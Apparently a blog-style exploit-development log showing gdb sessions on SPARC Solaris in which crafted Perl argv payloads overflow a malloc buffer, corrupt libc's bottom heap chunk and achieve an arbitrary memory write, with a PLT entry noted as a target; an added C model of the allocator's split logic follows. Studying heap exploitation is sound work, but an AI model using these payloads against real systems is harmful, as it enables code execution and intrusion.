Starting program: /tmp/a.out 801
Breakpoint 3, 0xff2c1d8c in malloc () from /usr/lib/libc.so.1
(gdb) x/x 0xff2c247c
0xff2c247c <realfree+112>: 0xd4062008
(gdb) x/i 0xff2c247c
0xff2c247c <realfree+112>: ld [ %i0 + 8 ], %o2
(gdb) r 800
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out 800
Breakpoint 3, 0xff2c1d8c in malloc () from /usr/lib/libc.so.1
(gdb) del
Delete all breakpoints? (y or n) y
(gdb) c
Continuing.
Program exited with code 03.
(gdb)
Starting program: /tmp/a.out `perl -e 'print "A"x800 . "\xff\xff\xff\xfc"x2 . "XXXX" . "\xff\xbe\xef\xd8" . "\xff\xbe\xef\x08" '`
Program received signal SIGSEGV, Segmentation fault.
0xff2c2b40 in t_splay () from /usr/lib/libc.so.1
(gdb) backtrace
#0 0xff2c2b40 in t_splay () from /usr/lib/libc.so.1
#1 0xff2c28b0 in t_delete () from /usr/lib/libc.so.1
#2 0xff2c24b4 in realfree () from /usr/lib/libc.so.1
#3 0xff2c2018 in _malloc_unlocked () from /usr/lib/libc.so.1
#4 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#5 0x0001072c in func () at d.c:4
#6 0x000107a8 in main (argc=2, argv=0xffbeed24) at d.c:16
(gdb)
[..]
(gdb) x/x &n
0xffbeecac: 0x00000000
(gdb) del
Delete all breakpoints? (y or n) y
(gdb) r `perl -e 'print "A"x800 . "\xff\xff\xff\xfc"x2 . "XXXX" . "\xff\xbe\xec\xa0" . "\xff\xbe\xef\x08" '`
This went on to show me the hidden “8 byte offset” difference :D
bazz@blade72[pts/2][/tmp] gdb a.out
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
/home/bazz/.gdb: No such file or directory.
(gdb) r `perl -e 'print "A"x0x320 ."\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
Starting program: /tmp/a.out `perl -e 'print "A"x0x320 ."\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
(gdb) r `perl -e 'print "A"x0x320 ."\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
Starting program: /tmp/a.out `perl -e 'print "A"x0x320 ."\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
^C
Program received signal SIGINT, Interrupt.
0xff31ecc0 in _read () from /usr/lib/libc.so.1
(gdb) x/x &n
No symbol "n" in current context.
(gdb) c
Continuing.
Program exited with code 03.
(gdb) list
1
2 func()
3 {
4 char *penis = malloc(300);
5 memset(penis,'B',300);
6 getchar();
7 }
8 main (int argc, char **argv)
9 {
10 int n = 5;
(gdb)
11 char *p = malloc(800);
12
13 strcpy(p,argv[1]);
14
15
16 func();
17 }
(gdb) b 17
Breakpoint 1 at 0x107a8: file d.c, line 17.
(gdb) r `perl -e 'print "A"x0x320 ."\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
Starting program: /tmp/a.out `perl -e 'print "A"x0x320 ."\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
Breakpoint 1, main (argc=2, argv=0xffbeece4) at d.c:17
17 }
(gdb) x/x &n
(gdb) x/x 0xffbeef10
0xffbeef10: 0x41414141
(gdb) x/x 0xffbeecbc
0xffbeecbc: 0x00000000
(gdb) x/x 0xffbeeccc
0xffbeeccc: 0x00000000
(gdb) x/x 0xffbeecac
0xffbeecac: 0x00000000
(gdb) x/96x 0xffbeec7c
0xffbeec7c: 0x00010574 0x00000002 0xffbeece4 0x00000000
0xffbeec8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeec9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeecac: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeecbc: 0x00000000 0x00000000 0x00000002 0xffbeece4
0xffbeeccc: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeecdc: 0x00000000 0x00000002 0xffbeee3c 0xffbeee47
0xffbeecec: 0x00000000 0xffbef19c 0xffbef1b7 0xffbef1d4
0xffbeecfc: 0xffbef1ef 0xffbef247 0xffbef26a 0xffbef28a
0xffbeed0c: 0xffbef295 0xffbef2a2 0xffbef2c6 0xffbef2e6
0xffbeed1c: 0xffbef2fd 0xffbef310 0xffbef334 0xffbef33e
0xffbeed2c: 0xffbef34a 0xffbef3a2 0xffbef8cb 0xffbef8d9
0xffbeed3c: 0xffbefa59 0xffbefa6e 0xffbefa92 0xffbefaab
0xffbeed4c: 0xffbefab4 0xffbefad8 0xffbefaf6 0xffbefce1
0xffbeed5c: 0xffbefd13 0xffbefd26 0xffbefd47 0xffbefd73
0xffbeed6c: 0xffbefd81 0xffbefde4 0xffbefe01 0xffbefe1f
0xffbeed7c: 0xffbefe40 0xffbefe56 0xffbefe68 0xffbefe89
0xffbeed8c: 0xffbefe99 0xffbefea1 0xffbefeb0 0xffbefebb
0xffbeed9c: 0xffbefed6 0xffbefee3 0xffbefef2 0xffbeff29
0xffbeedac: 0xffbeff4a 0xffbeff68 0xffbeff6f 0xffbeff90
0xffbeedbc: 0xffbeffbd 0x00000000 0x000007d8 0xffbeffda
0xffbeedcc: 0x000007de 0xffbeffed 0x00000003 0x00010034
0xffbeeddc: 0x00000004 0x00000020 0x00000005 0x00000005
0xffbeedec: 0x00000009 0x00010558 0x00000007 0xff3b0000
(gdb)
0xffbeedfc: 0x00000008 0x00000300 0x00000006 0x00002000
0xffbeee0c: 0x000007d0 0x00001caf 0x000007d1 0x00001caf
0xffbeee1c: 0x000007d2 0x00002801 0x000007d3 0x00002801
0xffbeee2c: 0x000007d9 0x00000007 0x00000000 0x00000000
0xffbeee3c: 0x2f746d70 0x2f612e6f 0x75740041 0x41414141
0xffbeee4c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee5c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee6c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee7c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee8c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee9c: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeeac: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeebc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeecc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeedc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeeec: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeefc: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef0c: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/x &n
0xffbeec6c: 0x00000005
(gdb)
0xffbeec70: 0x00000000
(gdb)
0xffbeec74: 0x00000000
(gdb)
(gdb) r `perl -e 'print "A"x0x320 ."\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x4c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out `perl -e 'print "A"x0x320 ."\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x4c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
Breakpoint 1, main (argc=2, argv=0xffbeece4) at d.c:17
(gdb) x/x &n
0xffbeec6c: 0x00000005
(gdb) x/96x &n
0xffbeec6c: 0x00000005 0x00000000 0x00000000 0xffbeec80
0xffbeec7c: 0x00010574 0x00000002 0xffbeece4 0x00000000
0xffbeec8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeec9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeecac: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeecbc: 0x00000000 0x00000000 0x00000002 0xffbeece4
0xffbeeccc: 0x00000000 0x00000000 0x00000000 0x00000000
0xffbeecdc: 0x00000000 0x00000002 0xffbeee3c 0xffbeee47
0xffbeecec: 0x00000000 0xffbef19c 0xffbef1b7 0xffbef1d4
0xffbeecfc: 0xffbef1ef 0xffbef247 0xffbef26a 0xffbef28a
0xffbeed0c: 0xffbef295 0xffbef2a2 0xffbef2c6 0xffbef2e6
0xffbeed1c: 0xffbef2fd 0xffbef310 0xffbef334 0xffbef33e
0xffbeed2c: 0xffbef34a 0xffbef3a2 0xffbef8cb 0xffbef8d9
0xffbeed3c: 0xffbefa59 0xffbefa6e 0xffbefa92 0xffbefaab
0xffbeed4c: 0xffbefab4 0xffbefad8 0xffbefaf6 0xffbefce1
0xffbeed5c: 0xffbefd13 0xffbefd26 0xffbefd47 0xffbefd73
0xffbeed6c: 0xffbefd81 0xffbefde4 0xffbefe01 0xffbefe1f
0xffbeed7c: 0xffbefe40 0xffbefe56 0xffbefe68 0xffbefe89
0xffbeed8c: 0xffbefe99 0xffbefea1 0xffbefeb0 0xffbefebb
0xffbeed9c: 0xffbefed6 0xffbefee3 0xffbefef2 0xffbeff29
0xffbeedac: 0xffbeff4a 0xffbeff68 0xffbeff6f 0xffbeff90
0xffbeedbc: 0xffbeffbd 0x00000000 0x000007d8 0xffbeffda
0xffbeedcc: 0x000007de 0xffbeffed 0x00000003 0x00010034
0xffbeeddc: 0x00000004 0x00000020 0x00000005 0x00000005
(gdb) r `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
Program received signal SIGSEGV, Segmentation fault.
0xff2c2a44 in t_splay () from /usr/lib/libc.so.1
(gdb) b *0xff2c1f98
Breakpoint 2 at 0xff2c1f98
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) n
Program not restarted.
(gdb) r `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
(gdb) x/15i $pc
0xff2c1f98 <_malloc_unlocked+468>: ld [ %o1 ], %o0
0xff2c1f9c <_malloc_unlocked+472>: mov %o1, %i4
0xff2c1fa0 <_malloc_unlocked+476>: cmp %i3, %o0
0xff2c1fa4 <_malloc_unlocked+480>: bgu 0xff2c1fbc <_malloc_unlocked+504>
0xff2c1fa8 <_malloc_unlocked+484>: nop
0xff2c1fac <_malloc_unlocked+488>: and %o0, -4, %o0
0xff2c1fb0 <_malloc_unlocked+492>: st %o0, [ %o1 ]
0xff2c1fb4 <_malloc_unlocked+496>: b 0xff2c1fdc <_malloc_unlocked+536>
0xff2c1fb8 <_malloc_unlocked+500>: ld [ %i4 ], %o0
0xff2c1fbc <_malloc_unlocked+504>: call 0xff2c2670 <_morecore>
0xff2c1fc0 <_malloc_unlocked+508>: mov %i3, %o0
0xff2c1fc4 <_malloc_unlocked+512>: orcc %g0, %o0, %i4
0xff2c1fc8 <_malloc_unlocked+516>: bne,a 0xff2c1fdc <_malloc_unlocked+536>
0xff2c1fcc <_malloc_unlocked+520>: ld [ %i4 ], %o0
0xff2c1fd0 <_malloc_unlocked+524>: ret
(gdb) x/x $o0
0xff342854: 0x00020d58
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c2a44 in t_splay () from /usr/lib/libc.so.1
(gdb) r `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
Breakpoint 2, 0xff2c1f98 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c2a44 in t_splay () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c2a44 in t_splay () from /usr/lib/libc.so.1
#1 0xff2c28b0 in t_delete () from /usr/lib/libc.so.1
#2 0xff2c24b4 in realfree () from /usr/lib/libc.so.1
#3 0xff2c2018 in _malloc_unlocked () from /usr/lib/libc.so.1
#4 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#5 0x0001072c in func () at d.c:4
#6 0x000107a8 in main (argc=2, argv=0xffbeed14) at d.c:16
(gdb) b *0xff2c1ebc
Breakpoint 3 at 0xff2c1ebc
(gdb) r `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
Breakpoint 3, 0xff2c1ebc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1ebc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1f98 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
(gdb) del 3
(gdb) r `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
(gdb) x/15i $pc
0xff2c1f98 <_malloc_unlocked+468>: ld [ %o1 ], %o0
0xff2c1f9c <_malloc_unlocked+472>: mov %o1, %i4
0xff2c1fa0 <_malloc_unlocked+476>: cmp %i3, %o0
0xff2c1fa4 <_malloc_unlocked+480>: bgu 0xff2c1fbc <_malloc_unlocked+504>
0xff2c1fa8 <_malloc_unlocked+484>: nop
0xff2c1fac <_malloc_unlocked+488>: and %o0, -4, %o0
0xff2c1fb0 <_malloc_unlocked+492>: st %o0, [ %o1 ]
0xff2c1fb4 <_malloc_unlocked+496>: b 0xff2c1fdc <_malloc_unlocked+536>
0xff2c1fb8 <_malloc_unlocked+500>: ld [ %i4 ], %o0
0xff2c1fbc <_malloc_unlocked+504>: call 0xff2c2670 <_morecore>
0xff2c1fc0 <_malloc_unlocked+508>: mov %i3, %o0
0xff2c1fc4 <_malloc_unlocked+512>: orcc %g0, %o0, %i4
0xff2c1fc8 <_malloc_unlocked+516>: bne,a 0xff2c1fdc <_malloc_unlocked+536>
0xff2c1fcc <_malloc_unlocked+520>: ld [ %i4 ], %o0
0xff2c1fd0 <_malloc_unlocked+524>: ret
(gdb) si
0xff2c1f9c in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) p/x $o0
$1 = 0xffffffd0
(gdb) p/x $i4
$2 = 0x0
(gdb) p/x $o1
$3 = 0x20d58
(gdb) p/x $i3
$4 = 0x130
(gdb) si
0xff2c1fa0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fa4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fa8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fac in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) si
0xff2c1fb0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) p/x $o0
$5 = 0xffffffd0
(gdb) si
0xff2c1fb4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fb8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fdc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/15i $pc
0xff2c1fdc <_malloc_unlocked+536>: add %i4, %o0, %o0
0xff2c1fe0 <_malloc_unlocked+540>: ld [ %o0 + 8 ], %o1
0xff2c1fe4 <_malloc_unlocked+544>: and %o1, -3, %o1
0xff2c1fe8 <_malloc_unlocked+548>: st %o1, [ %o0 + 8 ]
0xff2c1fec <_malloc_unlocked+552>: ld [ %i4 ], %o2
0xff2c1ff0 <_malloc_unlocked+556>: sub %o2, %i3, %o0
0xff2c1ff4 <_malloc_unlocked+560>: cmp %o0, 0x30
0xff2c1ff8 <_malloc_unlocked+564>: bcs 0xff2c2024 <_malloc_unlocked+608>
0xff2c1ffc <_malloc_unlocked+568>: sub %o0, 8, %o1
0xff2c2000 <_malloc_unlocked+572>: st %i3, [ %i4 ]
0xff2c2004 <_malloc_unlocked+576>: add %i4, %i3, %o0
0xff2c2008 <_malloc_unlocked+580>: or %o1, 1, %o1
0xff2c200c <_malloc_unlocked+584>: st %o1, [ %o0 + 8 ]
0xff2c2010 <_malloc_unlocked+588>: call 0xff2c240c <realfree>
0xff2c2014 <_malloc_unlocked+592>: add %o0, 0x10, %o0
(gdb) si
0xff2c1fe0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) p/x $o0
$6 = 0x20d28
(gdb) x/x 0x20d28
0x20d28: 0xfffffff8
(gdb)
Getting close to celebration point
bazz@blade72[pts/3][/tmp] cat e.c
func()
{
char *penis = malloc(10);
memset(penis,'B',300);
getchar();
}
main (int argc, char **argv)
{
int n = 5;
char *p = malloc(800);
strcpy(p,argv[1]);
printf ("n = 0x%x before awesomeness\n", n);
func();
printf ("n = 0x%x after awesomeness\n", n);
}
bazz@blade72[pts/3][/tmp] ./e AA
n = 0x5 before awesomeness
n = 0x5 after awesomeness
bazz@blade72[pts/3][/tmp] gdb e
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
/home/bazz/.gdb: No such file or directory.
(gdb) r `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\xa4" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xc8"'`
Starting program: /tmp/e `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\xa4" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xc8"'`
n = 0x5 before awesomeness
n = 0xffbeef08 after awesomeness
Program exited with code 0102.
(gdb)
At this point, I have the most important key to exploitation, an understanding of how the System V Bottom heap chunk can be exploited to do the coolio SWAP-O-ROONI trick.
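To pin down what the `_malloc_unlocked` disassembly above is doing with the bottom chunk, here is an added model of that split path (not the post's code and not Solaris source), with the arena simulated in a byte array and one bounds check on the successor header that libc does not make. The 8-byte header with a big-endian 4-byte size word, the BIT0/BIT1 meanings and the 0x30 threshold are assumptions read off the disassembly; the sizes 0x1cc8, 0x41001cc8 and 0xffffffd0 are the ones the post dumps.

```c
/* Added model of the bottom-chunk split in SVR4 (Solaris libc) _malloc_unlocked,
 * reconstructed from the disassembly quoted in this post. Not Solaris source and
 * not the post's own code. Assumed: 8-byte chunk header whose first 4 bytes are a
 * big-endian (SPARC) size word, BIT0 = busy, BIT1 = preceding chunk free. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define WORDSIZE  8u
#define BIT0      1u
#define BIT1      2u
#define SPLIT_MIN 0x30u      /* MINSIZE + WORDSIZE, the 'cmp %o0, 0x30' */
#define HEAP_LEN  0x2400u
enum { SPLIT_OK = 0, SPLIT_NEED_MORECORE = -1, SPLIT_CORRUPT = -2 };

static uint8_t g_heap[HEAP_LEN];   /* constructed arena; all values are offsets */

static uint32_t rd32be(const uint8_t *p) {
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}
static void wr32be(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}
uint32_t heap_size_word(uint32_t off) { return rd32be(g_heap + off); }
uint32_t round_req(uint32_t nbytes) { return (nbytes + 7u) & ~7u; }  /* 300 -> 0x130 (%i3) */

/* Mirrors _malloc_unlocked+468..+592 for the bottom chunk at offset 'bottom'.
 * On SPLIT_OK, *user is what malloc returns (bottom + WORDSIZE) and *rem is the
 * remainder header that libc then passes to realfree(), or 0 if there is none. */
int split_bottom(uint32_t bottom, uint32_t nbytes, uint32_t *user, uint32_t *rem)
{
    uint32_t nb = round_req(nbytes);
    uint32_t size = rd32be(g_heap + bottom);               /* ld [%o1], %o0 */
    if (nb > size)                                          /* cmp %i3,%o0 ; bgu -> _morecore */
        return SPLIT_NEED_MORECORE;
    size &= ~3u;                                            /* and %o0,-4 ; st %o0,[%o1] */
    wr32be(g_heap + bottom, size);
    uint32_t next = bottom + size + WORDSIZE;               /* add %i4,%o0,%o0 ; [%o0+8] */
    /* Added check, absent from libc: the successor header must lie inside the
     * arena and after the bottom chunk. The post's 0x41001cc8 puts it far past
     * the arena; 0xffffffd0 wraps it to 0x28 bytes before the bottom chunk. */
    if (next <= bottom || next + 4 > HEAP_LEN)
        return SPLIT_CORRUPT;
    wr32be(g_heap + next, rd32be(g_heap + next) & ~BIT1);  /* and %o1,-3 ; st %o1,[%o0+8] */
    uint32_t n = size - nb;                                 /* sub %o2,%i3,%o0 */
    *rem = 0;
    if (n >= SPLIT_MIN) {                                   /* bcs skips the split */
        n -= WORDSIZE;                                      /* sub %o0,8,%o1 */
        wr32be(g_heap + bottom, nb);                        /* st %i3,[%i4] */
        uint32_t tp = bottom + nb + WORDSIZE;               /* add %i4,%i3,%o0 ; +8 */
        wr32be(g_heap + tp, n | BIT0);                      /* or %o1,1 ; st */
        *rem = tp;                                          /* realfree(tp + WORDSIZE) follows */
    }
    /* Assumed: the common tail not shown in the post marks the chunk busy. */
    wr32be(g_heap + bottom, rd32be(g_heap + bottom) | BIT0);
    *user = bottom + WORDSIZE;
    return SPLIT_OK;
}

/* Constructed arena: the busy 800-byte 'A' buffer, then the bottom chunk whose
 * size word is the post's 0x41001cc8 with the overwritten first byte restored. */
#define P_HDR    0x100u
#define P_SIZE   0x320u
#define BOT_HDR  (P_HDR + WORDSIZE + P_SIZE)                /* 0x428 */
#define BOT_SIZE 0x1cc8u
uint32_t last_user, last_rem;                               /* results of the last scenario */

static void build_heap(void) {
    memset(g_heap, 0, HEAP_LEN);
    wr32be(g_heap + P_HDR, P_SIZE | BIT0);
    memset(g_heap + P_HDR + WORDSIZE, 'A', P_SIZE);        /* memset(p,'A',800) */
    wr32be(g_heap + BOT_HDR, BOT_SIZE);
}
/* malloc(300) from func() on an intact heap. */
int scenario_clean(void) {
    build_heap();
    return split_bottom(BOT_HDR, 300, &last_user, &last_rem);
}
/* The fill runs one byte long: the big-endian size word becomes 0x41001cc8. */
int scenario_first_byte_overflow(void) {
    build_heap();
    g_heap[BOT_HDR] = 'A';
    return split_bottom(BOT_HDR, 300, &last_user, &last_rem);
}
/* The size word the post reads from the bottom chunk after the crafted argv. */
int scenario_crafted_size(void) {
    build_heap();
    wr32be(g_heap + BOT_HDR, 0xffffffd0u);
    return split_bottom(BOT_HDR, 300, &last_user, &last_rem);
}

int main(void) {
    int rc = scenario_clean();
    printf("clean:    rc=%d user=0x%x remainder=0x%x size=0x%x\n", rc,
           (unsigned)last_user, (unsigned)last_rem, (unsigned)heap_size_word(last_rem));
    printf("overflow: rc=%d\n", scenario_first_byte_overflow());
    printf("crafted:  rc=%d\n", scenario_crafted_size());
    return 0;
}
```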
Here’s what I can overwrite:
(gdb) x/i 0xff2c1da0
0xff2c1da0 <malloc+24>: call 0xff33d044 <_PROCEDURE_LINKAGE_TABLE_+60>
(gdb) info proc map
process 27631 flags:
PR_STOPPED Process (LWP) is stopped
PR_ISTOP Stopped on an event of interest
PR_RLC Run-on-last-close is in effect
PR_FAULTED : Incurred a traced hardware fault FLTBPT: Breakpoint trap
Mapped address spaces:
Start Addr End Addr Size Offset Flags
0x10000 0x13fff 0x4000 0 ----r-x
0x22000 0x23fff 0x2000 0x2000 ----rwx
0x24000 0x33fff 0x10000 0 --b-rwx
0xff280000 0xff32bfff 0xac000 0 ----r-x
0xff33c000 0xff343fff 0x8000 0xac000 ----rwx
0xff370000 0xff371fff 0x2000 0 ----rwx
0xff380000 0xff383fff 0x4000 0 ----r-x
0xff390000 0xff391fff 0x2000 0 ----rwx
0xff3b0000 0xff3dffff 0x30000 0 ----r-x
0xff3e0000 0xff3e1fff 0x2000 0x30000 ----rwx
0xff3e2000 0xff3e3fff 0x2000 0 ----rwx
0xffbee000 0xffbeffff 0x2000 0 -s--rwx
Maybe an easy way to get at argv: the ___Argv symbol holds a pointer to the argv array, so argv[0] and argv[1] can be found without guessing stack offsets.
(gdb) x/s *0x22760
0x1: <Address 0x1 out of bounds>
(gdb) x/s *0x2275c
0xffbef02c: "\377\276\361\200\377\276\361\220"
(gdb) x/s **0x2275c
0xffbef180: "/home/bazz/w_32"
(gdb) x/s *(*0x2275c)+4)
Junk after end of expression.
(gdb) x/s *(*0x2275c))
Junk after end of expression.
(gdb) x/s **0x2275c+4
0xffbef184: "e/bazz/w_32"
(gdb) x/s *(*(0x2275c))
0xffbef180: "/home/bazz/w_32"
(gdb) x/s *(*(0x2275c)+4)
0xffbef190: "DDDDDAAHH"
(gdb) x/x *___Argv
0xffbef180: 0x2f686f6d
(gdb) x/x ___Argv
0xffbef02c: 0xffbef180
(gdb) x/x 0xffbef030
0xffbef030: 0xffbef190
(gdb) p/x $sp
$1 = 0xffbee6e0
Finally, the secret sauce.
Breakpoint 1 at 0x10790: file e.c, line 10.
(gdb) r `perl -e 'print "A"x1000000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/my_own_heap_exploit/e `perl -e 'print "A"x1000000'`
